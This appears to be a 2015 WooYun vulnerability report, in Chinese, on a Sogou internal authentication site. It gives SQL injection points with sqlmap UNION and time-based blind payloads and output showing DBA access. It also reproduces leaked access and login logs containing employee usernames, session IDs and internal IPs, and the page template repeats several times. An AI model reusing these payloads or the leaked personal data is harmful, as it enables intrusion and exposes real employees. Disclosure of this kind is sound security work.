搜狗某重要站点漏洞打包（内部人员名单一览无余）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0100398

漏洞标题：搜狗某重要站点漏洞打包（内部人员名单一览无余）

漏洞作者：路人甲

提交时间：2015-03-09 21:40

修复时间：2015-04-23 21:42

公开时间：2015-04-23 21:42

漏洞类型：敏感信息泄露

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-03-09：细节已通知厂商并且等待厂商处理中
2015-03-10：厂商已经确认，细节仅向厂商公开
2015-03-20：细节向核心白帽子及相关领域专家公开
2015-03-30：细节向普通白帽子公开
2015-04-09：细节向实习白帽子公开
2015-04-23：细节向公众公开

简要描述：

好累。

详细说明：

1.注入三处。
/admin/authSite.php-->site_name参数
/admin/search.php-->Mail参数，Site参数
http://authcenter.add.sogou-inc.com/admin/authSite.php
POST:
button=&display_name=AD_Alert&site_name=*
http://authcenter.add.sogou-inc.com/admin/search.php
POST:
button=&Mail=*&Site=http://www.wooyun.org

[*] starting at 21:15:31
[21:15:31] [WARNING] provided value for parameter 'button' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[21:15:31] [INFO] resuming back-end DBMS 'mysql' 
[21:15:31] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'http://authcenter.add.sogou-inc.com/login.php'. Don
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: Site (POST)
    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: button=&Mail=111@qq.com&Site=http://www.wooyun.org' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716b627171,0x6a77517845474d494645,0x7162767071),NULL,NULL,NULL,NULL-- 
Parameter: Mail (POST)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: button=&Mail=111@qq.com' AND (SELECT * FROM (SELECT(SLEEP(5)))puik) AND 'InNy'='InNy&Site=http://www.wooyun.org
    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: button=&Mail=111@qq.com' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716b627171,0x744f6166664a6849626f,0x7162767071),NULL,NULL,NULL,NULL-- &Site=http://www.wooyun.org
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: Site, type: Single quoted string (default)
[1] place: POST, parameter: Mail, type: Single quoted string
[q] Quit
> 0
[21:15:37] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.1.6
back-end DBMS: MySQL 5.0.11
[21:15:37] [INFO] testing if current user is DBA
[21:15:37] [INFO] fetching current user
current user is DBA:    True

database management system users [7]:
[*] 'adtotest'@'%'
[*] 'adts'@'%'
[*] 'adts'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'djt_5_193'
[*] 'root'@'localhost'
[*] 'wangjie'@'%'

2.列目录(列举了一部分)

http://authcenter.add.sogou-inc.com/logs/authcenter.add.sogu-inc.com-access_log （56M）
内部人员登陆信息

10.14.8.10 - - [09/Mar/2015:16:16:10 +0800] "GET /AuthCenterChecker.php?sessid=b6rr25givc7m13us6f85va09m4&usr=chenyongbin&domain=no.add.sogou-inc.com HTTP/1.1" 200 11
10.14.13.1 - - [09/Mar/2015:16:16:43 +0800] "GET /AuthCenterChecker.php?sessid=b6rr25givc7m13us6f85va09m4&usr=chenyongbin&domain=no.add.sogou-inc.com HTTP/1.1" 200 11
10.14.8.10 - - [09/Mar/2015:16:17:12 +0800] "GET /AuthCenterChecker.php?sessid=5joofnfdd0l19hlqf2iqto7107&usr=Songwanbo&domain=flow.add.sogou-inc.com HTTP/1.1" 200 9
10.13.208.190 - - [09/Mar/2015:16:17:13 +0800] "GET /style/PIE.js HTTP/1.1" 304 -
10.14.18.5 - - [09/Mar/2015:16:19:13 +0800] "GET /AuthCenterChecker.php?sessid=5joofnfdd0l19hlqf2iqto7107&usr=Songwanbo&domain=flow.add.sogou-inc.com HTTP/1.1" 200 9
10.13.208.190 - - [09/Mar/2015:16:19:13 +0800] "GET /style/PIE.js HTTP/1.1" 304 -
10.14.8.10 - - [09/Mar/2015:16:21:13 +0800] "GET /AuthCenterChecker.php?sessid=5joofnfdd0l19hlqf2iqto7107&usr=Songwanbo&domain=flow.add.sogou-inc.com HTTP/1.1" 200 9
10.13.208.190 - - [09/Mar/2015:16:21:13 +0800] "GET /style/PIE.js HTTP/1.1" 304 -
10.14.8.10 - - [09/Mar/2015:16:23:13 +0800] "GET /AuthCenterChecker.php?sessid=5joofnfdd0l19hlqf2iqto7107&usr=Songwanbo&domain=flow.add.sogou-inc.com HTTP/1.1" 200 9
10.13.208.190 - - [09/Mar/2015:16:23:13 +0800] "GET /style/PIE.js HTTP/1.1" 304 -
10.13.208.192 - - [09/Mar/2015:16:23:31 +0800] "GET /favicon.ico HTTP/1.1" 404 303
10.14.8.10 - - [09/Mar/2015:16:25:13 +0800] "GET /AuthCenterChecker.php?sessid=5joofnfdd0l19hlqf2iqto7107&usr=Songwanbo&domain=flow.add.sogou-inc.com HTTP/1.1" 200 9
10.13.208.190 - - [09/Mar/2015:16:25:13 +0800] "GET /style/PIE.js HTTP/1.1" 304 -
10.14.13.1 - - [09/Mar/2015:16:27:13 +0800] "GET /AuthCenterChecker.php?sessid=5joofnfdd0l19hlqf2iqto7107&usr=Songwanbo&domain=flow.add.sogou-inc.com HTTP/1.1" 200 9
10.13.208.190 - - [09/Mar/2015:16:27:13 +0800] "GET /style/PIE.js HTTP/1.1" 304 -
10.13.208.190 - - [09/Mar/2015:16:27:50 +0800] "GET /login.php?goto=http://adcpc.sogou-inc.com/ZFExtjs/public/index.php HTTP/1.1" 200 2045
10.13.208.190 - - [09/Mar/2015:16:27:52 +0800] "POST /login.php HTTP/1.1" 302 51
10.13.196.163 - - [09/Mar/2015:16:27:52 +0800] "GET /AuthCenterChecker.php?sessid=65v8q8oa170lejlmm1p952k9e1&usr=xingyun&domain=adcpc.sogou-inc.com HTTP/1.1" 200 7
10.13.208.190 - - [09/Mar/2015:16:27:52 +0800] "GET /style/PIE.js HTTP/1.1" 304 -
10.14.8.10 - - [09/Mar/2015:16:29:13 +0800] "GET /AuthCenterChecker.php?sessid=5joofnfdd0l19hlqf2iqto7107&usr=Songwanbo&domain=flow.add.sogou-inc.com HTTP/1.1" 200 9
10.13.208.190 - - [09/Mar/2015:16:29:13 +0800] "GET /style/PIE.js HTTP/1.1" 304 -
10.13.196.163 - - [09/Mar/2015:16:29:32 +0800] "GET /AuthCenterChecker.php?sessid=mla5levo9hm7n1t2piedvvpdi7&usr=yangjunzhe&domain=bizlog.sogou-inc.com HTTP/1.1" 200 1
10.13.196.163 - - [09/Mar/2015:16:29:32 +0800] "GET /forbid.php?loginres=5&domain=bizlog.sogou-inc.com HTTP/1.1" 200 170
10.14.8.10 - - [09/Mar/2015:16:30:35 +0800] "GET /AuthCenterChecker.php?sessid=ombjmulti1eamiga2ct3rre1t4&usr=yangyulian&domain=stat.adr.sogou-inc.com HTTP/1.1" 200 10
10.14.9.2 - - [09/Mar/2015:16:31:13 +0800] "GET /AuthCenterChecker.php?sessid=5joofnfdd0l19hlqf2iqto7107&usr=Songwanbo&domain=flow.add.sogou-inc.com HTTP/1.1" 200 9

http://authcenter.add.sogou-inc.com/log/ 登陆日志
http://authcenter.add.sogou-inc.com/log/LoginLog_20150309.log 截至到20150309

20150309 18:32:25 chensisi1798	adqa.sogou-inc.com	http://adqa.sogou-inc.com/qs/index.php/login 
20150309 18:39:08 yangna@sogou-inc.com	bizlog.sogou-inc.com	http://bizlog.sogou-inc.com/Bizlog/public/index.php 
20150309 18:49:12 jishanshan	adqa.sogou-inc.com	http://adqa.sogou-inc.com/qs/index.php/login 
20150309 18:49:19 jishanshan	adqa.sogou-inc.com	http://adqa.sogou-inc.com/qs/index.php/login 
20150309 18:59:10 chenaxia	adqa.sogou-inc.com	http://adqa.sogou-inc.com/qs/index.php/login 
20150309 19:00:42 zhaoshengyu	adqa.sogou-inc.com	http://adqa.sogou-inc.com/qs/index.php/login 
20150309 19:01:55 bihua	adqa.sogou-inc.com	http://adqa.sogou-inc.com/mediawiki/ 
20150309 19:03:15 zhaoxiangfeng@sogou-inc.com	adqa.sogou-inc.com	http://adqa.sogou-inc.com/mediawiki/ 
20150309 19:03:27 zhaoxiangfeng@sogou-inc.com	adqa.sogou-inc.com	http://adqa.sogou-inc.com/mediawiki/ 
20150309 19:03:31 zhaoxiangfeng@sogou-inc.com	adqa.sogou-inc.com	http://adqa.sogou-inc.com/mediawiki/ 
20150309 19:03:37 zhaoxiangfeng	adqa.sogou-inc.com	http://adqa.sogou-inc.com/mediawiki/ 
20150309 19:25:51 yaoxuanyu	adqa.sogou-inc.com	http://adqa.sogou-inc.com/mediawiki/ 
20150309 19:25:54 yaoxuanyu	adqa.sogou-inc.com	http://adqa.sogou-inc.com/mediawiki/ 
20150309 19:31:02 chaoyang206136	adqa.sogou-inc.com	http://adqa.sogou-inc.com/mediawiki/ 
20150309 19:33:06 yangdaiqing	adqa.sogou-inc.com	http://adqa.sogou-inc.com/qs/index.php/login 
20150309 19:39:59 haopanpan	adqa.sogou-inc.com	http://adqa.sogou-inc.com/qs/index.php/login 
20150309 19:47:19 chenjiajie	no.add.sogou-inc.com	http://no.add.sogou-inc.com/index.php 
20150309 19:55:31 wangzhenglei	adqa.sogou-inc.com	http://adqa.sogou-inc.com/mediawiki/ 
20150309 19:59:54 Hugen	adqa.sogou-inc.com	http://adqa.sogou-inc.com/mediawiki/ 
20150309 20:05:00 songqianqian	adqa.sogou-inc.com	http://adqa.sogou-inc.com/qs/index.php/login 
20150309 20:06:48 duzhangliang	adqa.sogou-inc.com	http://adqa.sogou-inc.com/mediawiki/ 
20150309 20:37:55 zhangchaosi1721	adqa.sogou-inc.com	http://adqa.sogou-inc.com/qs/index.php/login 
20150309 20:40:09 gaojun	adqa.sogou-inc.com	http://adqa.sogou-inc.com/mediawiki/ 
20150309 21:00:02 lihuabei	adqa.sogou-inc.com	http://adqa.sogou-inc.com/mediawiki/ 
20150309 21:24:37 wangxintang	adqa.sogou-inc.com	http://adqa.sogou-inc.com/qs/index.php/login

3.内部人员名单

漏洞证明：

详细说明

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2015-03-10 11:08

厂商回复：

修复中，感谢支持

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0100398

漏洞标题：搜狗某重要站点漏洞打包（内部人员名单一览无余）

相关厂商：搜狗

漏洞作者：路人甲

提交时间：2015-03-09 21:40

修复时间：2015-04-23 21:42

公开时间：2015-04-23 21:42

漏洞类型：敏感信息泄露

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0100398

漏洞标题：搜狗某重要站点漏洞打包（内部人员名单一览无余）

相关厂商：搜狗

漏洞作者： 路人甲

提交时间：2015-03-09 21:40

修复时间：2015-04-23 21:42

公开时间：2015-04-23 21:42

漏洞类型：敏感信息泄露

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0100398"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云